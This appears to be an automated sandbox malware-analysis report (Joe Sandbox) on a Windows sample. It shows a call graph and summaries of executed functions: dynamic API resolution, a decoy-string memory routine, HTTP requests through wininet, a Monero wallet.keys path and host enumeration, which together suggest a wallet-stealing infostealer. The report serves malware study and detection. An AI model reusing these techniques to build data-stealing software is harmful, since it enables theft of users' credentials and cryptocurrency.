15818->15819 15824 9286fd 15818->15824 15820 92a7a0 lstrcpy 15819->15820 15821 928776 15820->15821 15821->15271 15822 92a9b0 lstrcpy lstrlen lstrcpy lstrcat 15822->15824 15823 92a8a0 lstrcpy 15823->15824 15824->15818 15824->15822 15824->15823 15826 92a7a0 lstrcpy 15825->15826 15827 9251b5 15826->15827 15828 911590 lstrcpy 15827->15828 15829 9251c6 15828->15829 15844 915100 15829->15844 15831 9251cf 15831->15283 15835 927720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15832->15835 15834 9276b9 15834->15707 15834->15708 15836 927780 RegCloseKey 15835->15836 15837 927765 RegQueryValueExA 15835->15837 15838 927793 15836->15838 15837->15836 15838->15834 15839->15719 15841 9289f9 GetProcessHeap HeapFree 15840->15841 15842 928a0c 15840->15842 15841->15842 15842->15757 15843->15757 15845 92a7a0 lstrcpy 15844->15845 15846 915119 15845->15846 15847 9147b0 2 API calls 15846->15847 15848 915125 15847->15848 16004 928ea0 15848->16004 15850 915184 15851 915192 lstrlen 15850->15851 15852 9151a5 15851->15852 15853 928ea0 4 API calls 15852->15853 15854 9151b6 15853->15854 15855 92a740 lstrcpy 15854->15855 15856 9151c9 15855->15856 15857 92a740 lstrcpy 15856->15857 15858 9151d6 15857->15858 15859 92a740 lstrcpy 15858->15859 15860 9151e3 15859->15860 15861 92a740 lstrcpy 15860->15861 15862 9151f0 15861->15862 15863 92a740 lstrcpy 15862->15863 15864 9151fd InternetOpenA StrCmpCA 15863->15864 15865 91522f 15864->15865 15866 9158c4 InternetCloseHandle 15865->15866 15867 928b60 3 API calls 15865->15867 15873 9158d9 codecvt 15866->15873 15868 91524e 15867->15868 15869 92a920 3 API calls 15868->15869 15870 915261 15869->15870 15871 92a8a0 lstrcpy 15870->15871 15872 91526a 15871->15872 15874 92a9b0 4 API calls 15872->15874 15877 92a7a0 lstrcpy 15873->15877 15875 9152ab 15874->15875 15876 92a920 3 API calls 15875->15876 15878 9152b2 15876->15878 15884 915913 15877->15884 15879 92a9b0 4 API calls 15878->15879 15880 9152b9 15879->15880 15881 92a8a0 lstrcpy 15880->15881 15882 9152c2 15881->15882 15883 92a9b0 4 API calls 15882->15883 15885 915303 15883->15885 15884->15831 15886 92a920 3 API calls 15885->15886 15887 91530a 15886->15887 15888 92a8a0 lstrcpy 15887->15888 15889 915313 15888->15889 15890 915329 InternetConnectA 15889->15890 15890->15866 15891 915359 HttpOpenRequestA 15890->15891 15893 9158b7 InternetCloseHandle 15891->15893 15894 9153b7 15891->15894 15893->15866 15895 92a9b0 4 API calls 15894->15895 15896 9153cb 15895->15896 15897 92a8a0 lstrcpy 15896->15897 15898 9153d4 15897->15898 15899 92a920 3 API calls 15898->15899 15900 9153f2 15899->15900 15901 92a8a0 lstrcpy 15900->15901 15902 9153fb 15901->15902 15903 92a9b0 4 API calls 15902->15903 15904 91541a 15903->15904 15905 92a8a0 lstrcpy 15904->15905 15906 915423 15905->15906 15907 92a9b0 4 API calls 15906->15907 15908 915444 15907->15908 15909 92a8a0 lstrcpy 15908->15909 15910 91544d 15909->15910 15911 92a9b0 4 API calls 15910->15911 15912 91546e 15911->15912 15913 92a8a0 lstrcpy 15912->15913 16005 928ea9 16004->16005 16006 928ead CryptBinaryToStringA 16004->16006 16005->15850 16006->16005 16007 928ece GetProcessHeap RtlAllocateHeap 16006->16007 16007->16005 16008 928ef4 codecvt 16007->16008 16009 928f05 CryptBinaryToStringA 16008->16009 16009->16005 16013->15286 16256 919880 16014->16256 16016 9198e1 16016->15293 16018 92a740 lstrcpy 16017->16018 16019 91fb16 16018->16019 16191 92a740 lstrcpy 16190->16191 16192 920266 16191->16192 16193 928de0 2 API calls 16192->16193 16194 92027b 16193->16194 16195 92a920 3 API calls 16194->16195 16196 92028b 16195->16196 16197 92a8a0 lstrcpy 16196->16197 16198 920294 16197->16198 16199 92a9b0 4 API calls 16198->16199 16200 9202b8 16199->16200 16257 91988d 16256->16257 16260 916fb0 16257->16260 16259 9198ad codecvt 16259->16016 16263 916d40 16260->16263 16264 916d63 16263->16264 16275 916d59 16263->16275 16264->16275 16277 916660 16264->16277 16266 916dbe 16266->16275 16283 9169b0 16266->16283 16268 916e2a 16269 916ee6 VirtualFree 16268->16269 16271 916ef7 16268->16271 16268->16275 16269->16271 16270 916f41 16272 9289f0 2 API calls 16270->16272 16270->16275 16271->16270 16273 916f26 FreeLibrary 16271->16273 16274 916f38 16271->16274 16272->16275 16273->16271 16276 9289f0 2 API calls 16274->16276 16275->16259 16276->16270 16282 91668f VirtualAlloc 16277->16282 16279 916730 16280 916743 VirtualAlloc 16279->16280 16281 91673c 16279->16281 16280->16281 16281->16266 16282->16279 16282->16281 16284 9169c9 16283->16284 16288 9169d5 16283->16288 16285 916a09 LoadLibraryA 16284->16285 16284->16288 16286 916a32 16285->16286 16285->16288 16290 916ae0 16286->16290 16293 928a10 GetProcessHeap RtlAllocateHeap 16286->16293 16288->16268 16289 916ba8 GetProcAddress 16289->16288 16289->16290 16290->16288 16290->16289 16291 9289f0 2 API calls 16291->16290 16292 916a8b 16292->16288 16292->16291 16293->16292

                                        Executed Functions

                                        Function 00929860 Relevance: 79.0, APIs: 33, Strings: 12, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 929860-929874 call 929750 663 929a93-929af2 LoadLibraryA * 5 660->663 664 92987a-929a8e call 929780 GetProcAddress * 21 660->664 665 929af4-929b08 GetProcAddress 663->665 666 929b0d-929b14 663->666 664->663 665->666 668 929b46-929b4d 666->668 669 929b16-929b41 GetProcAddress * 2 666->669 671 929b68-929b6f 668->671 672 929b4f-929b63 GetProcAddress 668->672 669->668 673 929b71-929b84 GetProcAddress 671->673 674 929b89-929b90 671->674 672->671 673->674 675 929b92-929bbc GetProcAddress * 2 674->675 676 929bc1-929bc2 674->676 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,006B2428), ref: 009298A1
                                        • GetProcAddress.KERNEL32(74DD0000,006B2230), ref: 009298BA
                                        • GetProcAddress.KERNEL32(74DD0000,006B22A8), ref: 009298D2
                                        • GetProcAddress.KERNEL32(74DD0000,006B22C0), ref: 009298EA
                                        • GetProcAddress.KERNEL32(74DD0000,006B2368), ref: 00929903
                                        • GetProcAddress.KERNEL32(74DD0000,006B8F28), ref: 0092991B
                                        • GetProcAddress.KERNEL32(74DD0000,006A59F0), ref: 00929933
                                        • GetProcAddress.KERNEL32(74DD0000,006A5A90), ref: 0092994C
                                        • GetProcAddress.KERNEL32(74DD0000,006B2218), ref: 00929964
                                        • GetProcAddress.KERNEL32(74DD0000,006B23F8), ref: 0092997C
                                        • GetProcAddress.KERNEL32(74DD0000,006B24E8), ref: 00929995
                                        • GetProcAddress.KERNEL32(74DD0000,006B2458), ref: 009299AD
                                        • GetProcAddress.KERNEL32(74DD0000,006A5870), ref: 009299C5
                                        • GetProcAddress.KERNEL32(74DD0000,006B24D0), ref: 009299DE
                                        • GetProcAddress.KERNEL32(74DD0000,006B2398), ref: 009299F6
                                        • GetProcAddress.KERNEL32(74DD0000,006A56B0), ref: 00929A0E
                                        • GetProcAddress.KERNEL32(74DD0000,006B2320), ref: 00929A27
                                        • GetProcAddress.KERNEL32(74DD0000,006B22D8), ref: 00929A3F
                                        • GetProcAddress.KERNEL32(74DD0000,006A5A10), ref: 00929A57
                                        • GetProcAddress.KERNEL32(74DD0000,006B2278), ref: 00929A70
                                        • GetProcAddress.KERNEL32(74DD0000,006A56D0), ref: 00929A88
                                        • LoadLibraryA.KERNEL32(006B22F0,?,00926A00), ref: 00929A9A
                                        • LoadLibraryA.KERNEL32(006B24B8,?,00926A00), ref: 00929AAB
                                        • LoadLibraryA.KERNEL32(006B2308,?,00926A00), ref: 00929ABD
                                        • LoadLibraryA.KERNEL32(006B2338,?,00926A00), ref: 00929ACF
                                        • LoadLibraryA.KERNEL32(006B23B0,?,00926A00), ref: 00929AE0
                                        • GetProcAddress.KERNEL32(75A70000,006B2440), ref: 00929B02
                                        • GetProcAddress.KERNEL32(75290000,006B23C8), ref: 00929B23
                                        • GetProcAddress.KERNEL32(75290000,006B23E0), ref: 00929B3B
                                        • GetProcAddress.KERNEL32(75BD0000,006B2410), ref: 00929B5D
                                        • GetProcAddress.KERNEL32(75450000,006A5810), ref: 00929B7E
                                        • GetProcAddress.KERNEL32(76E90000,006B8F38), ref: 00929B9F
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00929BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: #k$($k$0"k$8#k$@$k$NtQueryInformationProcess$X$k$h#k$pXj$x"k$#k$$k
                                        • API String ID: 2238633743-89275038
                                        • Opcode ID: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                                        • Instruction ID: 7149d25357b407c0fde790e44ab5615a775ae814aad6026a47980cd29816527b
                                        • Opcode Fuzzy Hash: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                                        • Instruction Fuzzy Hash: E9A128B5500344AFD344EFA8FD98B663BF9F78C303B14479AA705A3264DE39A841CB52
                                        Function 009145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 9145c0-914695 RtlAllocateHeap 781 9146a0-9146a6 764->781 782 9146ac-91474a 781->782 783 91474f-9147a9 VirtualProtect 781->783 782->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0091460F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0091479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146D8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914770
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146C2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091475A
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914662
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091471E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091474F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091466D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914657
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145D2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914734
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914683
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091477B
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145F3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146CD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145C7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914729
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914713
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091473F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145E8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914678
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914765
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146AC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145DD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146B7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914638
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 708039367ef77192452d39cf244b629d9492e6deda605ffdbcdb63681da840d3
                                        • Instruction ID: 473d94282e7638cec5659b7e61da910e596f5b7915ecd13e8d5fd6685e20612f
                                        • Opcode Fuzzy Hash: 708039367ef77192452d39cf244b629d9492e6deda605ffdbcdb63681da840d3
                                        • Instruction Fuzzy Hash: D24137716C66047FE62AB7E78B42E9D72575FDA70EF93794CEA0052280CBF075086D22
                                        Function 00914880 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 914880-914942 call 92a7a0 call 9147b0 call 92a740 * 5 InternetOpenA StrCmpCA 816 914944 801->816 817 91494b-91494f 801->817 816->817 818 914955-914acd call 928b60 call 92a920 call 92a8a0 call 92a800 * 2 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a920 call 92a8a0 call 92a800 * 2 InternetConnectA 817->818 819 914ecb-914ef3 InternetCloseHandle call 92aad0 call 919ac0 817->819 818->819 905 914ad3-914ad7 818->905 829 914f32-914fa2 call 928990 * 2 call 92a7a0 call 92a800 * 8 819->829 830 914ef5-914f2d call 92a820 call 92a9b0 call 92a8a0 call 92a800 819->830 830->829 906 914ae5 905->906 907 914ad9-914ae3 905->907 908 914aef-914b22 HttpOpenRequestA 906->908 907->908 909 914b28-914e28 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a740 call 92a920 * 2 call 92a8a0 call 92a800 * 2 call 92aad0 lstrlen call 92aad0 * 2 lstrlen call 92aad0 HttpSendRequestA 908->909 910 914ebe-914ec5 InternetCloseHandle 908->910 1021 914e32-914e5c InternetReadFile 909->1021 910->819 1022 914e67-914eb9 InternetCloseHandle call 92a800 1021->1022 1023 914e5e-914e65 1021->1023 1022->910 1023->1022 1024 914e69-914ea7 call 92a9b0 call 92a8a0 call 92a800 1023->1024 1024->1021
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914915
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 0091493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914ABA
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00930DDB,00000000,?,?,00000000,?,",00000000,?,006BEA88), ref: 00914DE8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00914E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00914E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00914E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00914EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00914EC5
                                        • HttpOpenRequestA.WININET(00000000,006BEA78,?,006BE230,00000000,00000000,00400100,00000000), ref: 00914B15
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00914ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------$0k$hk$xk
                                        • API String ID: 460715078-3059890706
                                        • Opcode ID: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                                        • Instruction ID: dac3edc1f8bcd7e1d41c35c523c3749dda5c2139c6d52137a5d84d4e5e8b164c
                                        • Opcode Fuzzy Hash: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                                        • Instruction Fuzzy Hash: BA12BD729112289BDB15EB90EC92FEEB778BF98300F504199F10662095DF702F89CF66
                                        Function 009278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
